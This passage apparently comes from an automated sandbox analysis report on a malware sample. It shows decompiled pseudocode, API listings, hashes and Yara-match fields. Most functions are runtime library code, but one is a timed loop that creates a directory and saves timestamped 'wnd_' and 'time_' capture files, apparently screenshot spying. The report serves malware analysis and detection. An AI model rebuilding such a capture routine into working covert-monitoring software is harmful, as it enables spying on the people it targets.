                              0x00440887
                              0x0044088f
                              0x00440892
                              0x00440897
                              0x0044089a
                              0x0044089e
                              0x004408a9
                              0x004408b4
                              0x004408bf
                              0x004408ca
                              0x004408d5
                              0x004408e0
                              0x004408eb
                              0x004408f9
                              0x00440901
                              0x0044090a
                              0x00440912
                              0x00440926

                              APIs
                              • _free.LIBCMT ref: 00440892
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 0044089E
                              • _free.LIBCMT ref: 004408A9
                              • _free.LIBCMT ref: 004408B4
                              • _free.LIBCMT ref: 004408BF
                              • _free.LIBCMT ref: 004408CA
                              • _free.LIBCMT ref: 004408D5
                              • _free.LIBCMT ref: 004408E0
                              • _free.LIBCMT ref: 004408EB
                              • _free.LIBCMT ref: 004408F9
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
                              • Instruction ID: c522220ac2d5c32fe01852b59e6646c10f04ef358e737e5df1941df93b3e5ff3
                              • Opcode Fuzzy Hash: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
                              • Instruction Fuzzy Hash: 6B11A476101108AFCF11EF56C942CD93BA6EF08754F0150AAFA188F262DE35EA55DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043D65F, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMON
                              Download Yara Rule
                              C-Code - Quality: 71%
                              			E0043D65F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46a00c; // 0x5d382218
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00440972(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = L0043CDA9(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043E61D(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb86e
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E00440264(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043629A();
									asm("int3");
									return  *0x46b508;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = L0043CAB6(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = L00447F5C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457400, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004330D1( &_v528,  *0x46a170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x457340; // 0x40e12c
									 *0x45346c(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46a2a8;
										if(_t228 != 0x46a2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												L0043EE85( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												L0043EE85( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb86e
												L0043EE85( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb86e
										L0043EE85( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										L0043EE85(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0042F61B(_v8 ^ _t262);
				}
				L47:
			}
























































                              0x0043d662
                              0x0043d66a
                              0x0043d671
                              0x0043d674
                              0x0043d675
                              0x0043d678
                              0x0043d67c
                              0x0043d67d
                              0x0043d680
                              0x0043d690
                              0x0043d69c
                              0x0043d6b3
                              0x0043d6b8
                              0x0043d6bd
                              0x0043d6d2
                              0x0043d6d5
                              0x0043d6d5
                              0x0043d6d8
                              0x0043d6de
                              0x0043d6e7
                              0x0043d6e9
                              0x0043d6ec
                              0x0043d6f3
                              0x0043d6f6
                              0x0043d6fc
                              0x00000000
                              0x00000000
                              0x0043d6fe
                              0x0043d702
                              0x0043d72b
                              0x0043d72b
                              0x0043d704
                              0x0043d704
                              0x0043d708
                              0x0043d70c
                              0x0043d713
                              0x0043d719
                              0x00000000
                              0x0043d71b
                              0x0043d71b
                              0x0043d71e
                              0x0043d721
                              0x0043d729
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d729
                              0x0043d719
                              0x0043d738
                              0x0043d738
                              0x0043d73a
                              0x0043d740
                              0x0043d746
                              0x0043d749
                              0x0043d749
                              0x0043d74c
                              0x0043d74f
                              0x0043d74f
                              0x0043d75f
                              0x0043d76d
                              0x0043d772
                              0x0043d779
                              0x0043d77b
                              0x00000000
                              0x0043d781
                              0x0043d787
                              0x0043d78d
                              0x0043d794
                              0x0043d79a
                              0x0043d79d
                              0x0043d7a3
                              0x0043d7b0
                              0x0043d7b7
                              0x0043d7bc
                              0x0043d7bf
                              0x0043d7c1
                              0x0043da1a
                              0x0043da20
                              0x0043da21
                              0x0043da22
                              0x0043da23
                              0x0043da24
                              0x0043da25
                              0x0043da2a
                              0x0043da30
                              0x0043d7c7
                              0x0043d7c7
                              0x0043d7d5
                              0x0043d7d8
                              0x0043d7f3
                              0x0043d7fa
                              0x0043d800
                              0x0043d806
                              0x0043d7da
                              0x0043d7da
                              0x0043d7e2
                              0x00000000
                              0x0043d7e4
                              0x0043d7e4
                              0x0043d7ea
                              0x0043d7ea
                              0x0043d7e2
                              0x0043d80d
                              0x0043d810
                              0x0043d92d
                              0x0043d930
                              0x0043d93d
                              0x0043d940
                              0x0043d948
                              0x0043d948
                              0x0043d932
                              0x0043d938
                              0x0043d938
                              0x0043d816
                              0x0043d816
                              0x0043d81c
                              0x0043d824
                              0x0043d826
                              0x0043d829
                              0x0043d832
                              0x0043d83b
                              0x0043d841
                              0x0043d841
                              0x0043d844
                              0x0043d846
                              0x00000000
                              0x00000000
                              0x0043d848
                              0x0043d84e
                              0x0043d84f
                              0x0043d85a
                              0x0043d862
                              0x0043d86a
                              0x0043d86d
                              0x0043d870
                              0x0043d876
                              0x0043d87c
                              0x0043d882
                              0x0043d888
                              0x0043d88b
                              0x00000000
                              0x00000000
                              0x0043d88d
                              0x0043d8b2
                              0x0043d8b2
                              0x0043d8b5
                              0x0043d8b9
                              0x0043d8d2
                              0x0043d8d7
                              0x0043d8da
                              0x0043d8dc
                              0x0043d8e2
                              0x0043d91d
                              0x0043d8e4
                              0x0043d8e4
                              0x0043d8e9
                              0x0043d8f1
                              0x0043d8f2
                              0x0043d8f2
                              0x0043d909
                              0x0043d910
                              0x0043d913
                              0x0043d918
                              0x0043d918
                              0x0043d920
                              0x0043d923
                              0x0043d923
                              0x0043d928
                              0x00000000
                              0x0043d928
                              0x0043d88f
                              0x0043d891
                              0x0043d896
                              0x0043d89c
                              0x0043d8a5
                              0x0043d8ae
                              0x0043d8ae
                              0x00000000
                              0x0043d891
                              0x0043d94b
                              0x0043d94b
                              0x0043d94f
                              0x0043d957
                              0x0043d95d
                              0x0043d960
                              0x0043d966
                              0x0043d968
                              0x0043d9a8
                              0x0043d9ae
                              0x0043d9b5
                              0x0043d9b5
                              0x0043d9bb
                              0x0043d9bf
                              0x00000000
                              0x0043d9c1
                              0x0043d9c1
                              0x0043d9c5
                              0x0043d9ca
                              0x0043d9ce
                              0x0043d9d3
                              0x0043d9da
                              0x0043d9e8
                              0x0043d9ee
                              0x0043d9f1
                              0x0043d9f1
                              0x0043d9bf
                              0x0043da00
                              0x0043da08
                              0x0043da11
                              0x0043d96a
                              0x0043d970
                              0x0043d973
                              0x0043d97a
                              0x0043d98c
                              0x0043d993
                              0x0043d9a0
                              0x00000000
                              0x0043d9a0
                              0x00000000
                              0x0043d968
                              0x0043d7c1
                              0x0043d73c
                              0x00000000
                              0x0043d73c
                              0x00000000
                              0x0043d73a
                              0x0043d733
                              0x0043d735
                              0x0043d735
                              0x00000000
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6c1
                              0x0043d6d1
                              0x0043d6d1
                              0x00000000

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                              • _memcmp.LIBVCRUNTIME ref: 0043D909
                              • _free.LIBCMT ref: 0043D97A
                              • _free.LIBCMT ref: 0043D993
                              • _free.LIBCMT ref: 0043D9C5
                              • _free.LIBCMT ref: 0043D9CE
                              • _free.LIBCMT ref: 0043D9DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorLast$_abort_memcmp
                              • String ID: C$@
                              • API String ID: 1679612858-1810246019
                              • Opcode ID: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
                              • Instruction ID: 52565f1e93295bb36fd0e3f4fb9911c45a8627ad54808d25164a72537c1ebd07
                              • Opcode Fuzzy Hash: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
                              • Instruction Fuzzy Hash: F1B13775E012199BDB24DF19D885BAEB7B4FF48304F2045AAE849A7351E734AE90CF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004152D7, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E004152D7() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E00450918(0x451ece, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					L00413D5E(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					L00401EDA(0x46c880, _t132, _t141, E0041481D(_t146 - 0x40));
					L00401ED0();
				}
				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
				_t45 = L00401ECB(L00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
				L00401ED0();
				L00401ED0();
				CreateDirectoryW(L00401ECB(0x46c868), _t92);
				L00401F4D(_t92, _t146 - 0xb0);
				L00401F4D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, E00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_t72 = L00401ECB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040425F(_t92, _t148, _t83);
						_t85 = E00417417(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}




















                              0x004152dc
                              0x004152e8
                              0x004152ea
                              0x004152ed
                              0x004152ef
                              0x004152f2
                              0x004152f8
                              0x004152fa
                              0x004152fd
                              0x00415300
                              0x0041530e
                              0x0041530e
                              0x00415314
                              0x0041531a
                              0x0041532a
                              0x00415332
                              0x00415332
                              0x00415347
                              0x00415363
                              0x00415369
                              0x0041537c
                              0x00415384
                              0x0041538c
                              0x0041539a
                              0x004153a6
                              0x004153ae
                              0x004153b3
                              0x004153b6
                              0x004153c7
                              0x004153cd
                              0x004153d0
                              0x004153d3
                              0x00000000
                              0x004153d9
                              0x004153dc
                              0x00415424
                              0x00415428
                              0x00415432
                              0x00415437
                              0x0041543c
                              0x00415441
                              0x00415446
                              0x00415454
                              0x00415459
                              0x00415498
                              0x004154a0
                              0x004154a8
                              0x004154b3
                              0x004154bb
                              0x004154c3
                              0x004154c8
                              0x004154d5
                              0x004154d8
                              0x004154f6
                              0x004154f8
                              0x0041550f
                              0x0041550f
                              0x004154da
                              0x004154ee
                              0x004154ee
                              0x00415517
                              0x00415519
                              0x00000000
                              0x00415519
                              0x004153de
                              0x004153e3
                              0x004153e6
                              0x004153e6
                              0x004153e8
                              0x00000000
                              0x00000000
                              0x004153f8
                              0x004153fd
                              0x00415403
                              0x0041540a
                              0x0041540f
                              0x00415412
                              0x00415414
                              0x00415419
                              0x00000000
                              0x00000000
                              0x00415420
                              0x00415420
                              0x00000000
                              0x004153e6

                              APIs
                              • __EH_prolog.LIBCMT ref: 004152DC
                              • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                                • Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
                              • Sleep.KERNEL32(000003E8), ref: 00415420
                              • GetLocalTime.KERNEL32(?), ref: 00415428
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 649275306-3790400642
                              • Opcode ID: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
                              • Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
                              • Opcode Fuzzy Hash: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
                              • Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004437EC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E004437EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46a00c; // 0x5d382218
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0043E036(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004422AE( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004422AE();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x443f61
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x443f61
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0042F61B(_v8 ^ _t136);
			}


































                              0x004437f4
                              0x004437fb
                              0x004437fe
                              0x00443806
                              0x0044380a
                              0x00443816
                              0x00443819
                              0x0044381c
                              0x00443823
                              0x0044382b
                              0x0044382e
                              0x00443834
                              0x0044383a
                              0x0044383f
                              0x00443841
                              0x00443844
                              0x00443849
                              0x00443853
                              0x0044385a
                              0x0044385d
                              0x00443864
                              0x0044386b
                              0x00443897
                              0x004438bd
                              0x004438bf
                              0x00000000
                              0x00443899
                              0x0044389c
                              0x00443963
                              0x0044396f
                              0x0044397a
                              0x0044397f
                              0x004438a2
                              0x004438a9
                              0x004438ae
                              0x004438b4
                              0x004438ba
                              0x00000000
                              0x004438ba
                              0x004438b4
                              0x0044389c
                              0x0044386d
                              0x00443871
                              0x00443874
                              0x0044387a
                              0x0044387c
                              0x0044387f
                              0x00443883
                              0x004438c0
                              0x004438c3
                              0x004438c4
                              0x004438c9
                              0x004438cf
                              0x004438d5
                              0x004438e4
                              0x004438ea
                              0x004438f0
                              0x004438f5
                              0x004438fd
                              0x00443911
                              0x00443984
                              0x0044398a
                              0x00443913
                              0x0044391b
                              0x00443924
                              0x0044392a
                              0x00000000
                              0x0044392c
                              0x0044392e
                              0x00443931
                              0x00443935
                              0x0044394a
                              0x00000000
                              0x0044394c
                              0x00443950
                              0x00443952
                              0x00443955
                              0x00000000
                              0x00443955
                              0x00443950
                              0x0044394a
                              0x0044392a
                              0x00443924
                              0x00443911
                              0x004438f5
                              0x004438cf
                              0x00000000
                              0x00443958
                              0x00443958
                              0x0044398c
                              0x0044399e

                              APIs
                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00443F61,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044382E
                              • __fassign.LIBCMT ref: 004438A9
                              • __fassign.LIBCMT ref: 004438C4
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 004438EA
                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443909
                              • WriteFile.KERNEL32(?,?,00000001,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443942
                              Strings
                              Memory Dump Source
